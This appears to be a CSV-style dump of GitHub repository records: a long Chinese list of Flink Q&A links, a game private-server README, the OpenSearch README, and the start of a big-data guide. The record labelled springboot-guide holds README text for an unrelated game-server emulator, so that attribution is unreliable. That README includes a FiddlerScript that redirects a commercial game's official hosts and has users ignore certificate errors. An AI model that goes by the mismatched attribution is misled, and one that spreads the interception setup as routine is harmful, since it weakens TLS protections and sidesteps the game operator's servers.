329、[link中处理数据其中一条出了异常都会导致整个job挂掉?有没有方法(除了异常捕获)让这条数据记录错误日志就行 下面的数据接着处理呢? 粗略看过一些容错处理,是关于程度挂了重启后从检查点拉取数据,但是如果这条数据本身就问提(特别生产上,这样就导致job直接挂了,影响有点大),那应该怎么过滤掉这条问题数据呢(异常捕获是最后的方法](https://t.zsxq.com/6AIQnEi)
330、[我在一个做日报的统计中使用rabbitmq做数据源,为什么rabbitmq中的数据一直处于unacked状态,每分钟触发一次窗口计算,并驱逐计算过的元素,我在测试环境数据都能ack,但是一到生产环境就不行了,也没有报错,有可能是哪里出了问题啊](https://t.zsxq.com/RBmi2vB)
331、[我们目前数据流向是这样的,kafka source ,etl,redis sink 。这样chk 是否可以保证端到端语义呢?](https://t.zsxq.com/fuNfuBi)
332、[1.在通过 yarn-session 提交 flink job 的时候。flink-core, flink-clients, flink-scala, flink-streaming-scala, scala-library, flink-connector-kafka-0.10 那些应该写 provided scope,那些应该写 compile scope,才是正确、避免依赖冲突的姿势?
2.flink-dist_2.11-1.8.0.jar 究竟包含了哪些依赖?(这个文件打包方式不同于 springboot,无法清楚看到有哪些 jar 依赖)](https://t.zsxq.com/mIeMzvf)
333、[Flink 中使用 count window 会有这样的问题就是,最后有部分数据一直没有达到 count 的值,然后窗口就一直不触发,这里看到个思路,可以将 time window + count window 组合起来](https://t.zsxq.com/AQzj6Qv)
334、[flink流处理时,注册一个流数据为Table后,该流的历史数据也会一直在Table里面么?为什么每次来新数据,历史处理过得数据会重新被执行?](https://t.zsxq.com/VvR3Bai)
335、[available是变化数据,除了最新的数据被插入数据库,之前处理过数据又重新执行了几次](https://t.zsxq.com/jMfyNZv)
336、[这里两天在研究flink的广播变量,发现一个问题,DataSet数据集中获取广播变量,获取的内存地址是一样的(一台机器维护一个广播数据集)。在DataStream中获取广播变量就成了一个task维护一个数据集。(可能是我使用方式有问题) 所以想请教下星主,DataStream中获取一个画面变量可以如DataSet中一台机器维护一个数据吗?](https://t.zsxq.com/m6Yrv7Q)
337、[Flink程序开启checkpoint 机制后,用yarn命令多次killed以后,ckeckpoint目录下有多个job id,再次开辟资源重新启动程序,程序如何找到上一次jobid目录下,而不是找到其他的jobid目录下?默认是最后一个还是需要制定特定的jobid?](https://t.zsxq.com/nqzZrbq)
338、[发展昨天的数据重复插入问题,是把kafka里进来的数据流registerDataStream注册为Table做join时,打印表的长度发现,数据会一直往表里追加,怎样才能来一条处理一条,不往上追加呀](https://t.zsxq.com/RNzfQ7e)
339、[flink1.9 sql 有没有类似分区表那样的处理方式呢?我们现在有一个业务是1个source,但是要分别计算5分钟,10分钟,15分钟的数据。](https://t.zsxq.com/AqRvNNj)
340、[我刚弄了个服务器,在启动基础的命令时候发现task没有启动起来,导致web页是三个0,我看了log也没有报错信息,请问您知道可能是什么问题吗?](https://t.zsxq.com/q3feIuv)
241、[我自定义了个 Sink extends RichSinkFunction,有了 field: private transient Object lock;
这个 lock 我直接初始化 private transient Object lock = new Object(); 就不行,在 invoke 里 使用lock时空指针,如果lock在 自定义 Sink 的 构造器初始化也不行。但是在 open 方法里初始化就可以,为什么?能解释一下 执行原理吗?如果一个slot 运行着5个 sink实例,那么 这个sink对象会new 5个还是1个?](https://t.zsxq.com/EIiyjeU)
342、[请问Kafka的broker 个数怎么估算?](https://t.zsxq.com/aMNnIy3)
343、[flink on yarn如何远程调试](https://t.zsxq.com/BU7iqbi)
344、[目前有个需求:就是源数据是dataA、dataB、DataC通过kafka三个topic获取,然后进行合并。
但是有有几个问题,目前不知道怎么解决:
dataA=""id:10001,info:***,date:2019-08-01 12:23:33,entry1:1,entryInfo1:***""
dataB=""id:10001,org:***,entry:1"" dataC=""id:10001,location:***""
(1) 如何将三个流合并? (1) 数据中dataA是有时间的,但是dataB和dataC中都没有时间戳,那么如何解决eventTime及迟到乱序的问题?帮忙看下,谢谢](https://t.zsxq.com/F6U7YbY)
345、[我flink从kafka读json数据,在反序列化后中文部分变成了一串问号,请问如何做才能使中文正常](https://t.zsxq.com/JmIqfaE)
346、[我有好几个Flink程序(独立jar),在线业务数据分析时都会用到同样的一批MySQL中的配置数据(5千多条),现在的实现方法是每一个程序都是独立把这些配置数据装到内存中,便于快速使用,但现在感觉有些浪费资源和结构不够美观,请问这类情况有什么其他的解决方案吗?谢谢](https://t.zsxq.com/3BMZfAM)
347、[Flink checkpoint 选 RocksDBStateBackend 还是 FsStatebackEnd ,我们目前是任务执行一段时间之后 任务就会被卡死。](https://t.zsxq.com/RFMjYZn)
348、[flink on k8s的高可用、扩缩容这块目前还有哪些问题?](https://t.zsxq.com/uVv7uJU)
349、[有个问题问一下,是这样的现在Kafka4个分区每秒钟生产4000多到5000条日志数据,但是在消费者FLINK这边接收我只开了4个solt接收,这边只是接收后做切分存储,现在出现了延迟现象,我不清楚是我这边处切分慢了还是Flink接收kafka的数据慢了?Flink UI界面显示这两个背压高](https://t.zsxq.com/zFq3fqb)
350、[想请问一下,在flink集群模式下,能不能指定某个节点来执行一个task?](https://t.zsxq.com/NbaMjem)
+ [请问一下aggrefunction 的merge方法什么时候会用到呢,google上有答案说合并相同的key, 但相同的key应该是被hash相同的task上了?这块不是很理解](https://t.zsxq.com/VnEim6m)
+ [请问flink遇到这种问题怎么解决?1. eventA发起事件,eventB响应事件,每分钟统计事件的响应的成功率。说明,eventA和eventB有相同的commitId关联,eventA到flink的时间早于eventB的时间,但eventB到达的时间也有可能早于eventA。要求是:eventA有A,B,C,D,E五条数据,如果eventB有A',B',C',X',Y'五条数据,成功率是3/5.2. 每分钟统计一次eventC成功率(状态0、1)。但该事件日志会重复报,只统计eventTime最早的一条。上一分钟统计到过的,下一分钟不再统计](https://t.zsxq.com/eMnMrRJ)
+ [Flink当前版本中Yarn,k8s,standalone的HA设计方案与源码解析请问可以系统性讲讲么](https://t.zsxq.com/EamqrFQ)
+ [怎么用javaAPI提交job以yarn-cluster模式运行](https://t.zsxq.com/vR76amq)
+ [有人遇到过流损坏的问题么?不知道怎么着手解决?](https://t.zsxq.com/6iMvjmq)
+ [从这个日志能看出什么异常的原因吗?我查看了kafka,yarn,zookeeper。这三个组件都没有任何异常](https://t.zsxq.com/uByFUrb)
+ [为啥flink内部维护两套通信框架,client与jobmanager和jobmanager与taskmanager是akka通信,然而takmanager之间是netty通信?](https://t.zsxq.com/yvBiImq)
+ [问各位球友一个小问题,flink 的 wordcount ,输出在控制台的时候,前面有个数字 > 是什么意思](https://t.zsxq.com/yzzBMji)
+ [从kafka的topicA读数据,转换后写入topicB,开启了checkpoint,任务启动后正常运行,新的topic也有数据写入,但是想监控一下消费topicA有没有延迟,使用kafka客户端提供的脚本查看groupid相关信息,提示没有该groupid](https://t.zsxq.com/MNFUVnE)
+ [将flink分流之后,再进行窗口计算,如何将多个窗口计算的结果汇总起来 作为一个sink,定时输出?
我想将多个流计算的不同实时统计指标,比如每1min对多个指标进行统计(多个指标分布在不同的流里面),然后将多个指标作为一条元组存入mysql中?](https://t.zsxq.com/mUfm2zF)
+ [Flink最终如何输出到数据大屏上去。](https://t.zsxq.com/nimeA66)
+ [为什么我keyby 之后,不同key的数据会进入同一个AggregateFunction中吗? 还是说不同key用的AggregateFunction实列是同一个呢?我在AggregateFunction中给一个对象赋值之后,发现其他key的数据会把之前的数据覆盖,这是怎么回事啊?](https://t.zsxq.com/IMzBUFA)
+ [flink窗口计算的结果怎么和之前的结果聚合在一起](https://t.zsxq.com/yFI2FYv)
+ [flink on yarn 的任务该如何监控呢,之前自带 influxdb metrics 好像无法采集到flink on yarn 的指标](https://t.zsxq.com/ZZ3FmqF)
+ [link1.9.0消费kafka0.10.1.1数据时,通过ui监控查看发现部分分区的current offset和commit offset一直显示为负数,随着程序运行也始终不变,麻烦问下这是怎么回事?](https://t.zsxq.com/QvRNjiU)
+ [flink 1.9 使用rank的时候报,org.apache.flink.table.api.TableException: RANK() on streaming table is not supported currently](https://t.zsxq.com/Y7MBaQb)
+ [Flink任务能不能动态的变更source源kafka的topic,但是又不用重启任务](https://t.zsxq.com/rzVjMjM)
+ [1、keyed state 和opeater state 区分点是啥(是否进行了shuffle流程?)
2、CheckpointedFunction 这个接口的作用是啥?
3、何时调用这个snapshotState这个方法?](https://t.zsxq.com/ZVnEyne)
+ [请教一下各位大佬,日志一般都怎么收集?task manager貌似把不同job的日志都打印在一起,有木有分开打印的办法?](https://t.zsxq.com/AayjeiM)
+ [最近接到一个需求,统计今天累计在线人数并且要去重,每5秒显示一次结果,请问如何做这个需求?](https://t.zsxq.com/IuJ2FYR)
+ [目前是flink消费kafka的一个问题。kafka使用的是阿里云的kafka,可以申请consumer。目前在同一个A-test的topic下,使用A1的consumer组进行消费,但是在两个程序里,source端得到的数据量差别很大,图一是目前消费kafka写入到另一个kafka的topic中,目前已知只有100条;图二是消费kafka,写入到hdfs中。两次消费起始偏移量一致(消费后,恢复偏移量到最初再消费)按照时间以及设置从头开始消费的策略也都还是只有100条;后面我把kafka的offset提交到checkpoint选项关掉了,也还是只有100条。很奇怪,所以想问一下,目前这个问题是要从state来出发解决](https://t.zsxq.com/eqBUZFm)
+ [问一下 grafana的dashboard 有没有推荐的,我们现在用是prometheus pushgateway reporter来收集metric。但是目前来说,到底哪些指标是要重点关注的还是不太清楚](https://t.zsxq.com/EYz7iMV)
+ [on yarn 1. session 模式提交是不是意味着 多个flink任务会由同一个 jobManager 管理 2. per-job 模式 会启动各自多个jobManager](https://t.zsxq.com/u3vVV3b)
+ [您在flink里面使用过lettuce连接redis cluster吗,我这里使用时报错,Cannot retrieve initial cluster partitions from initial URIs](https://t.zsxq.com/VNnEQJ6)
+ [zhisheng你好,我在使用flink滑动窗口时,每10分钟会向redis写入大量的内容,影响了线上性能,这个有什么办法可以控制写redis的速度吗?](https://t.zsxq.com/62ZZJmi)
+ [flink standalone模式,启动服务的命令为:flink run -c 类名 jar包 。对应的Slots怎么能均匀分布呢?目前遇到问题,一直使用一个机器的Slots,任务多了后直接会把taskjob挂掉。报错信息如二图](https://t.zsxq.com/2zjqVnE)
+ [zhisheng你好,像standalone与yarn集群,其master与workers相互通信都依赖于ssh协议,请问有哪种不依赖于ssh协议的搭建方式吗?](https://t.zsxq.com/qzrvbaQ)
+ [官网中,这两种周期性watermaker的产生分别适用什么场景呢?](https://t.zsxq.com/2fUjAQz)
+ [周期性的watermarke 设置定时产生, ExecutionConfig.setAutoWatermarkInterval(…),这个定时的时间一般怎样去评估呢?](https://t.zsxq.com/7IEAyV3)
+ [想问一下能否得到flink分配资源的时间?](https://t.zsxq.com/YjqRBq3)
+ [问下flink向kafka生产数据有时候报错:This server does not host this topic-partition](https://t.zsxq.com/vJyJiMJ)
+ [flink yarn 模式启动,log4j. properties配置信息见图片,yarn启动页面的taskmanager能看到日志输出到stdout,但是在指定的日志文件夹中就是没有日志文件生成。,本地运行有日志文件的](https://t.zsxq.com/N3ZrZbQ)
+ [教一个问题。flink2hbase 如何根据hbase中的日期字段,动态按天建表呢?我自定义了hbase sink,在invoke方法中根据数据的时间建表,但是带来了一个问题,每条数据都要去check表是否存在,这样会产生大量的rpc请求。请问星主大大,针对上述这种情况,有什么好的解决办法吗?](https://t.zsxq.com/3rNBubU)
+ [你好,有关于TM,slots,内存,线程数,进程数,cpu,调度相关的资料吗?比如一个slot起多少线程,为什么,如何起的,task是如何调度的之类的。网上没找到想要的,书上写的也不够细。源码的话刚开始看不太懂,所以想先找找资料看看](https://t.zsxq.com/buBIAMf)
+ [能否在flink中只新建一个FlinkKafkaConsumer读取多个kafka的topics ,这些topics的处理逻辑都是一样的 最终将数据写入每个topic对应的es表 请问这个实现逻辑是怎样的 ](https://t.zsxq.com/EY37aEm)
+ [能不能描述一下在窗口中,例如滚动窗口,多个事件进窗口后,事件在内存中保存的形式是怎么样的?会变成一个state?还是多个事件变成一个state?事件跟state的关系?事件时间过了在窗口是怎么清理事件的?如果state backends用的是RocksDBStateBackend,增量checkpoint,怎么清理已保存过期的事件咧?](https://t.zsxq.com/3vzzj62)
+ [请问一下 Flink的监控是如何做的?比如job挂了能告警通知。目前是想用Prometheus来做监控,但是发现上报的指标没有很符合的我需求。我这边用yarn-session启动的job,一个jobManger会管理多个job。Prometheus还是刚了解阶段可能遗漏了一些上报指标,球主大大有没有好的建议。](https://t.zsxq.com/vJyRnY7)
+ [ProcessTime和EventTime是否可以一起使用?当任务抛出异常失败的时候,如果配置了重启策略,重启时是不是从最近的checkpoint继续?遇到了一个数据库主键冲突的问题,查看kafka数据源发现该主键的消息只有一条,查看日志发现Redis连接池抛了异常(当时Redis在重启)导致任务失败重试,当时用的ProcessTime](https://t.zsxq.com/BuZJaUb)
+ [flink-kafka 自定义反序列化中如何更好的处理数据异常呢,有翻到前面一篇提问,如果使用 try-catch 捕获到异常,是抛出异常更好呢?还是return null 更好呢](https://t.zsxq.com/u3niYni)
+ [现在在用flink做上下游数据的比对,现在遇到了性能瓶颈,一个节点现在最多只能消费50条数据。观察taskmanager日志的gc日志发现最大堆内存有2.7g,但是新生代最大只有300m。能不能设置flink的jvm参数,flink on yarn启动模式](https://t.zsxq.com/rvJYBuB)
+ [请教一个原理性的问题,side out put和直接把一个流用两种方式处理有啥本质区别?我试了下,把一个流一边写缓存,一边入数据库,两边也都是全量数据](https://t.zsxq.com/Ee27i6a)
+ [如何定义一个flink window处理方式,1秒钟处理500条,1:kafka中有10000条数据时,仍旧1秒钟处理500条;2,kafka中有20条,每隔1秒处理一次。](https://t.zsxq.com/u7YbyFe)
+ [问一下大佬,网页UI可以进行savepoint的保存么?还是只能从savepoint启动?](https://t.zsxq.com/YfAqFUj)
+ [能否指定Kafka某些分区消费拉取消息,其他分区不拉取消息。现在有有很多场景,一个topic上百个分区,但是我只需要其中几个分区的数据](https://t.zsxq.com/AUfEAQB)
+ [我想过滤kafka 读到的某些数据,过滤条件从redis中拿到(与用户的配置相关,所以需要定时更新),总觉得怪怪的,请问有更好的方案吗?因为不提供redis的source,因此我是用jedis客户端来读取redis数据的,数据也获取不到,请问星主,flink代码在编写的时候,一般是如何调试的呢](https://t.zsxq.com/qr7UzjM)
+ [flink使用rocksdb状态检查点存在HDFS上,有的任务状态很小但是HDFS一个文件最小128M所以磁盘空间很快就满了,有没有啥配置可以自动清理检查点呢](https://t.zsxq.com/Ufqj2ZR)
+ [这是实时去重的问题。
举个例子,当发生订单交易的时候,业务中台会把该比订单消息发送到kafka,然后flink消费,统计总金额。如果因为业务中台误操作,发送了多次相同的订单过来(订单id相同),那么统计结果就会多次累加,造成统计的总金额比实际交易金额更多。我需要自定义在source里通过operate state去重,但是operate state是和每个source实例绑定,会造成重复的订单可能发送到不同的source实例,这样取出来的state里面就可能没有上一次已经记录的订单id,那么就会将这条重复的订单金额统计到最后结果中,](https://t.zsxq.com/RzB6E6A)
+ [双流join的时候,怎么能保证两边来的数据是对应的?举个例子,订单消息和库存消息,按逻辑来说,发生订单的时候,库存也会变,这两个topic都会同时各自发一条消息给我,我拿到这两条消息会根据订单id做join操作。问题是那如果库存消息延迟了5秒或者10秒,订单消息来的时候就join不到库存消息,这时候该怎么办?](https://t.zsxq.com/nunynmI)
+ [我这有一个比对程序用的是flink,数据源用的是flink-kafka,业务数据分为上下游,需要根据某个字段分组,相同的key上下游数据放一起比对。上下游数据进来的时间不一样,因此我用了一个可以迭代的窗口大小为5分钟window进行比对处理,最大迭代次数为3次。statebackend用的是fsstatebackend。通过监控发现当程序每分钟数据量超过2万条的时候,程序就不消费数据了,虽然webui上显示正常,而且jobmanager和taskmanager的stdout没有异常日志,但是程序就是不消费数据了。](https://t.zsxq.com/nmeE2Fm)
+ [异步io里面有个容量,是指同时多少个并发还是,假如我每个taskmanager核数设置10个,共10个taskmanager,那我这个数量只能设置100呢](https://t.zsxq.com/vjimeiI)
+ [有个性能问题想问下有没有相关的经验?一个job从kafka里读一个topic数据,然后进行分流,使用sideout分开之后直接处理,性能影响大吗?比如分开以后有一百多子任务。还有其他什么好的方案进行分流吗?](https://t.zsxq.com/mEeUrZB)
+ [线上有个作业抛出了一下异常,但是还能正常运行,这个怎么排查,能否提供一下思路](https://t.zsxq.com/Eayzr3R)
等等等,还有很多,复制粘贴的我手累啊 😂
另外里面还会及时分享 Flink 的一些最新的资料(包括数据、视频、PPT、优秀博客,持续更新,保证全网最全,因为我知道 Flink 目前的资料还不多)
[关于自己对 Flink 学习的一些想法和建议](https://t.zsxq.com/AybAimM)
[Flink 全网最全资料获取,持续更新,点击可以获取](https://t.zsxq.com/iaEiyB2)
再就是星球用户给我提的一点要求:不定期分享一些自己遇到的 Flink 项目的实战,生产项目遇到的问题,是如何解决的等经验之谈!
1、[如何查看自己的 Job 执行计划并获取执行计划图](https://t.zsxq.com/Zz3ny3V)
2、[当实时告警遇到 Kafka 千万数据量堆积该咋办?](https://t.zsxq.com/AIAQrnq)
3、[如何在流数据中比两个数据的大小?多种解决方法](https://t.zsxq.com/QnYjy7M)
4、[kafka 系列文章](https://t.zsxq.com/6Q3vN3b)
5、[Flink环境部署、应用配置及运行应用程序](https://t.zsxq.com/iiYfMBe)
6、[监控平台该有架构是长这样子的](https://t.zsxq.com/yfYrvFA)
7、[《大数据“重磅炸弹”——实时计算框架 Flink》专栏系列文章目录大纲](https://t.zsxq.com/beu7Mvj)
8、[《大数据“重磅炸弹”——实时计算框架 Flink》Chat 付费文章](https://t.zsxq.com/UvrRNJM)
9、[Apache Flink 是如何管理好内存的?](https://t.zsxq.com/zjQvjeM)
10、[Flink On K8s](https://t.zsxq.com/eYNBaAa)
11、[Flink-metrics-core](https://t.zsxq.com/Mnm2nI6)
12、[Flink-metrics-datadog](https://t.zsxq.com/Mnm2nI6)
13、[Flink-metrics-dropwizard](https://t.zsxq.com/Mnm2nI6)
14、[Flink-metrics-graphite](https://t.zsxq.com/Mnm2nI6)
15、[Flink-metrics-influxdb](https://t.zsxq.com/Mnm2nI6)
16、[Flink-metrics-jmx](https://t.zsxq.com/Mnm2nI6)
17、[Flink-metrics-slf4j](https://t.zsxq.com/Mnm2nI6)
18、[Flink-metrics-statsd](https://t.zsxq.com/Mnm2nI6)
19、[Flink-metrics-prometheus](https://t.zsxq.com/Mnm2nI6)
20、[Flink 注解源码解析](https://t.zsxq.com/f6eAu3J)
21、[使用 InfluxDB 和 Grafana 搭建监控 Flink 的平台](https://t.zsxq.com/yVnaYR7)
22、[一文搞懂Flink内部的Exactly Once和At Least Once](https://t.zsxq.com/UVfqfae)
23、[一文让你彻底了解大数据实时计算框架 Flink](https://t.zsxq.com/eM3ZRf2)
当然,除了更新 Flink 相关的东西外,我还会更新一些大数据相关的东西,因为我个人之前不是大数据开发,所以现在也要狂补些知识!总之,希望进来的童鞋们一起共同进步!
1、[Java 核心知识点整理.pdf](https://t.zsxq.com/7I6Iyrf)
2、[假如我是面试官,我会问你这些问题](https://t.zsxq.com/myJYZRF)
3、[Kafka 系列文章和学习视频](https://t.zsxq.com/iUZnamE)
4、[重新定义 Flink 第二期 pdf](https://t.zsxq.com/r7eIeyJ)
5、[GitChat Flink 文章答疑记录](https://t.zsxq.com/ZjiYrVr)
6、[Java 并发课程要掌握的知识点](https://t.zsxq.com/QZVJyz7)
7、[Lightweight Asynchronous Snapshots for Distributed Dataflows](https://t.zsxq.com/VVN7YB2)
8、[Apache Flink™- Stream and Batch Processing in a Single Engine](https://t.zsxq.com/VVN7YB2)
9、[Flink状态管理与容错机制](https://t.zsxq.com/NjAQFi2)
10、[Flink 流批一体的技术架构以及在阿里的实践](https://t.zsxq.com/MvfUvzN)
11、[Flink Checkpoint-轻量级分布式快照](https://t.zsxq.com/QVFqjea)
12、[Flink 流批一体的技术架构以及在阿里的实践](https://t.zsxq.com/MvfUvzN)
13、[Stream Processing with Apache Flink pdf](https://t.zsxq.com/N37mUzB)
14、[Flink 结合机器学习算法的监控平台实践](https://t.zsxq.com/m6EAaQ3)
15、[《大数据重磅炸弹-实时计算Flink》预备篇——大数据实时计算介绍及其常用使用场景 pdf 和视频](https://t.zsxq.com/emMBaQN)
16、[《大数据重磅炸弹-实时计算Flink》开篇词 pdf 和视频](https://t.zsxq.com/fqfuVRR)
17、[四本 Flink 书](https://t.zsxq.com/rVBQFI6)
18、[流处理系统 的相关 paper](https://t.zsxq.com/rVBQFI6)
19、[Apache Flink 1.9 特性解读](https://t.zsxq.com/FyzvRne)
20、[打造基于Flink Table API的机器学习生态](https://t.zsxq.com/FyzvRne)
21、[基于Flink on Kubernetes的大数据平台](https://t.zsxq.com/FyzvRne)
22、[基于Apache Flink的高性能机器学习算法库](https://t.zsxq.com/FyzvRne)
23、[Apache Flink在快手的应用与实践](https://t.zsxq.com/FyzvRne)
24、[Apache Flink-1.9与Hive的兼容性](https://t.zsxq.com/FyzvRne)
25、[打造基于Flink Table API的机器学习生态](https://t.zsxq.com/FyzvRne)
26、[流处理系统的相关 paper](https://t.zsxq.com/rVBQFI6)"
CodingDocs/springboot-guide,master,5064,1390,2018-11-28T01:05:07Z,5354,16,SpringBoot2.0+从入门到实战!,asynchronous dubbo mybatis rabbitmq spring-data-jpa springboot,"👍推荐[2021最新实战项目源码下载](https://mp.weixin.qq.com/s?__biz=Mzg2OTA0Njk0OA==&mid=100018862&idx=1&sn=858e00b60c6097e3ba061e79be472280&chksm=4ea1856579d60c73224e4d852af6b0188c3ab905069fc28f4b293963fd1ee55d2069fb229848#rd)
👍[《JavaGuide 面试突击版》PDF 版本](#公众号) 。[图解计算机基础 PDF 版](#优质原创PDF资源)
书单已经被移动到[awesome-cs](https://github.com/CodingDocs/awesome-cs) 这个仓库。
[EN](README.md) | [简中](docs/README_zh-CN.md) | [繁中](docs/README_zh-TW.md) | [JP](docs/README_ja-JP.md) | [RU](docs/README_ru-RU.md) | [FR](docs/README_fr-FR.md) | [KR](docs/README_ko-KR.md) | [VI](docs/README_vi-VI.md)
**Attention:** For any extra support, questions, or discussions, check out our [Discord](https://discord.gg/cfPKJ6N5hw).
### Notable features
- Basic game features: Logging in, team setup, inventory, basic scene/entity management
- Monster battles working
- Natural world monster/prop/NPC spawns
- Character techniques
- Crafting/Consumables working
- NPC shops handled
- Gacha system
- Mail system
- Friend system (Assists are not working yet)
- Forgotten hall
- Pure Fiction
- Simulated universe (Runs can be finished, but many features are missing)
# Running the server and client
### Prerequisites
* [Java 17 JDK](https://www.oracle.com/java/technologies/javase/jdk17-archive-downloads.html)
### Recommended
* [MongoDB 4.0+](https://www.mongodb.com/try/download/community)
### Compiling the server
1. Open your system terminal, and compile the server with `./gradlew jar`
2. Create a folder named `resources` in your server directory
3. Download the `Config`, `TextMap`, and `ExcelBin` folders from [https://github.com/Dimbreath/StarRailData](https://github.com/Dimbreath/StarRailData) and place them into your resources folder.
4. Delete the `/resources/Config/LevelOutput` folder.
5. Download the `Config` folder from [https://gitlab.com/Melledy/LunarCore-Configs](https://gitlab.com/Melledy/LunarCore-Configs) and place them into your resources folder. These are for world spawns and are very important for the server.
6. Run the server with `java -jar LunarCore.jar` from your system terminal. Lunar Core comes with a built-in internal MongoDB server for its database, so no Mongodb installation is required. However, it is highly recommended to install Mongodb anyway.
### Connecting with the client (Fiddler method)
1. **Log in with the client to an official server and Hoyoverse account at least once to download game data.**
2. Install and have [Fiddler Classic](https://www.telerik.com/fiddler) running.
3. Set fiddler to decrypt https traffic. (Tools -> Options -> HTTPS -> Decrypt HTTPS traffic) Make sure `ignore server certificate errors` is checked as well.
4. Copy and paste the following code into the Fiddlerscript tab of Fiddler Classic:
```
import System;
import System.Windows.Forms;
import Fiddler;
import System.Text.RegularExpressions;
class Handlers
{
static function OnBeforeRequest(oS: Session) {
if (oS.host.EndsWith("".starrails.com"") || oS.host.EndsWith("".hoyoverse.com"") || oS.host.EndsWith("".mihoyo.com"") || oS.host.EndsWith("".bhsr.com"")) {
oS.host = ""localhost""; // This can also be replaced with another IP address.
}
}
};
```
5. If `autoCreateAccount` is set to true in the config, then you can skip this step. Otherwise, type `/account create [account name]` in the server console to create an account.
6. Login with your account name, the password field is ignored by the server and can be set to anything.
### Server commands
Server commands can be run in the server console or in-game. There is a dummy user named ""Server"" in every player's friends list that you can message to use in-game commands.
```
/account {create | delete} [username] (reserved player uid). Creates or deletes an account.
/avatar lv(level) p(ascension) r(eidolon) s(skill levels). Sets the current avatar's properties.
/clear {relics | lightcones | materials | items}. Removes filtered items from the player inventory.
/gender {male | female}. Sets the player's gender.
/give [item id] x[amount] lv[number]. Gives the targetted player an item.
/giveall {materials | avatars | lightcones | relics}. Gives the targeted player items.
/heal. Heals your avatars.
/help. Displays a list of available commands.
/kick @[player id]. Kicks a player from the server.
/mail [content]. Sends the targeted player a system mail.
/permission {add | remove | clear} [permission]. Gives/removes a permission from the targeted player.
/refill. Refill your skill points in open world.
/reload. Reloads the server config.
/scene [scene id] [floor id]. Teleports the player to the specified scene.
/spawn [monster/prop id] x[amount] s[stage id]. Spawns a monster or prop near the targeted player.
/stop. Stops the server
/unstuck @[player id]. Unstucks an offline player if they're in a scene that doesn't load.
/worldlevel [world level]. Sets the targeted player's equilibrium level.
```
"
opensearch-project/OpenSearch,main,8663,1577,2021-01-29T22:10:00Z,570602,1662,🔎 Open source distributed and RESTful search engine.,analytics apache2 foss hacktoberfest java search search-engine,"
[![Chat](https://img.shields.io/badge/chat-on%20forums-blue)](https://forum.opensearch.org/c/opensearch/)
[![Documentation](https://img.shields.io/badge/documentation-reference-blue)](https://opensearch.org/docs/latest/opensearch/index/)
[![Code Coverage](https://codecov.io/gh/opensearch-project/OpenSearch/branch/main/graph/badge.svg)](https://codecov.io/gh/opensearch-project/OpenSearch)
[![Untriaged Issues](https://img.shields.io/github/issues/opensearch-project/OpenSearch/untriaged?labelColor=red)](https://github.com/opensearch-project/OpenSearch/issues?q=is%3Aissue+is%3Aopen+label%3A""untriaged"")
[![Security Vulnerabilities](https://img.shields.io/github/issues/opensearch-project/OpenSearch/security%20vulnerability?labelColor=red)](https://github.com/opensearch-project/OpenSearch/issues?q=is%3Aissue+is%3Aopen+label%3A""security%20vulnerability"")
[![Open Issues](https://img.shields.io/github/issues/opensearch-project/OpenSearch)](https://github.com/opensearch-project/OpenSearch/issues)
[![Open Pull Requests](https://img.shields.io/github/issues-pr/opensearch-project/OpenSearch)](https://github.com/opensearch-project/OpenSearch/pulls)
[![2.14.0 Open Issues](https://img.shields.io/github/issues/opensearch-project/OpenSearch/v2.14.0)](https://github.com/opensearch-project/OpenSearch/issues?q=is%3Aissue+is%3Aopen+label%3A""v2.14.0"")
[![3.0.0 Open Issues](https://img.shields.io/github/issues/opensearch-project/OpenSearch/v3.0.0)](https://github.com/opensearch-project/OpenSearch/issues?q=is%3Aissue+is%3Aopen+label%3A""v3.0.0"")
[![GHA gradle check](https://github.com/opensearch-project/OpenSearch/actions/workflows/gradle-check.yml/badge.svg)](https://github.com/opensearch-project/OpenSearch/actions/workflows/gradle-check.yml)
[![GHA validate pull request](https://github.com/opensearch-project/OpenSearch/actions/workflows/wrapper.yml/badge.svg)](https://github.com/opensearch-project/OpenSearch/actions/workflows/wrapper.yml)
[![GHA precommit](https://github.com/opensearch-project/OpenSearch/actions/workflows/precommit.yml/badge.svg)](https://github.com/opensearch-project/OpenSearch/actions/workflows/precommit.yml)
[![Jenkins gradle check job](https://img.shields.io/jenkins/build?jobUrl=https%3A%2F%2Fbuild.ci.opensearch.org%2Fjob%2Fgradle-check%2F&label=Jenkins%20Gradle%20Check)](https://build.ci.opensearch.org/job/gradle-check/)
- [Welcome!](#welcome)
- [Project Resources](#project-resources)
- [Code of Conduct](#code-of-conduct)
- [Security](#security)
- [License](#license)
- [Copyright](#copyright)
- [Trademark](#trademark)
## Welcome!
**OpenSearch** is [a community-driven, open source fork](https://aws.amazon.com/blogs/opensource/introducing-opensearch/) of [Elasticsearch](https://en.wikipedia.org/wiki/Elasticsearch) and [Kibana](https://en.wikipedia.org/wiki/Kibana) following the [license change](https://blog.opensource.org/the-sspl-is-not-an-open-source-license/) in early 2021. We're looking to sustain (and evolve!) a search and analytics suite for the multitude of businesses who are dependent on the rights granted by the original, [Apache v2.0 License](LICENSE.txt).
## Project Resources
* [Project Website](https://opensearch.org/)
* [Downloads](https://opensearch.org/downloads.html)
* [Documentation](https://opensearch.org/docs/)
* Need help? Try [Forums](https://discuss.opendistrocommunity.dev/)
* [Project Principles](https://opensearch.org/#principles)
* [Contributing to OpenSearch](CONTRIBUTING.md)
* [Maintainer Responsibilities](MAINTAINERS.md)
* [Release Management](RELEASING.md)
* [Admin Responsibilities](ADMINS.md)
* [Testing](TESTING.md)
* [Security](SECURITY.md)
## Code of Conduct
This project has adopted the [Amazon Open Source Code of Conduct](CODE_OF_CONDUCT.md). For more information see the [Code of Conduct FAQ](https://aws.github.io/code-of-conduct-faq), or contact [opensource-codeofconduct@amazon.com](mailto:opensource-codeofconduct@amazon.com) with any additional questions or comments.
## Security
If you discover a potential security issue in this project we ask that you notify AWS/Amazon Security via our [vulnerability reporting page](http://aws.amazon.com/security/vulnerability-reporting/) or directly via email to aws-security@amazon.com. Please do **not** create a public GitHub issue.
## License
This project is licensed under the [Apache v2.0 License](LICENSE.txt).
## Copyright
Copyright OpenSearch Contributors. See [NOTICE](NOTICE.txt) for details.
## Trademark
OpenSearch is a registered trademark of Amazon Web Services.
OpenSearch includes certain Apache-licensed Elasticsearch code from Elasticsearch B.V. and other source code. Elasticsearch B.V. is not the source of that other source code. ELASTICSEARCH is a registered trademark of Elasticsearch B.V.
"
MoRan1607/BigDataGuide,master,2491,838,2019-11-30T12:02:52Z,130167,0,大数据学习,从零开始学习大数据,包含大数据学习各阶段学习视频、面试资料,bigdata flink flume hadoop hbase hive javase kafka scala spark zookeeper,"大数据学习指南
===
